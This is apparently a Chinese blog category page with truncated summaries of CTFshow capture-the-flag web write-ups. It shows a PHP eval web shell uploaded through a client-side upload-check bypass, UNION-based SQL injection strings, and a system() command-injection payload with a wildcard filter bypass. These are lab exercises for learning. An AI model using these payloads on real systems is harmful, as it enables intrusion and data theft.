文章分类 -  靶场_ctfshow

摘要:Web151 1、F12检查上传点确认为JS验证,只支持png格式 2、上传1.png,抓包修改文件名为1.php,内容为<?php @eval($_POST['x']); ?> 3、访问文件地址,使用hackbar(也可以使用burpsuite)在POST中传入x的值 4、成功获取flag Web 阅读全文
posted @ 2022-03-02 14:38 爱吃菠菜的无力水手 阅读(173) 评论(0) 推荐(0)
摘要:Web171 审题:已知GET中需要接收id的值,且被引号包含 解题:1、1’ order by 3 --+ 测试字段 2、1‘ union select 1,2,3 --+ 爆数字 3、1’ union select database(),2,3 --+ 爆库名,库名为ctfshow_web 4、 阅读全文
posted @ 2022-01-27 17:48 爱吃菠菜的无力水手 阅读(185) 评论(0) 推荐(0)
摘要:Web254 审题:三个if对应了三个条件。 1、条件一:GET中传递username和password的值 2、条件二:username、password的值和格式都必须完全相等 3、条件三:只要触发checkVip函数,就返回flag 解题:1、url中输入?username=xxxxxx&pa 阅读全文
posted @ 2022-01-26 10:21 爱吃菠菜的无力水手 阅读(111) 评论(0) 推荐(0)
摘要:web29 审题:已知c为可控变量,且过滤了字符串flag的大小写 解题:1、使用正则表达式将flag替换成fla* 2、在url中输入 ?c=system("cat fla*"); 3、出现空白页,右击审查源代码获取flag 4、成功过关! web30 审题:已知c为可控变量,且过滤了字符串fla 阅读全文
posted @ 2022-01-25 15:25 爱吃菠菜的无力水手 阅读(37) 评论(0) 推荐(0)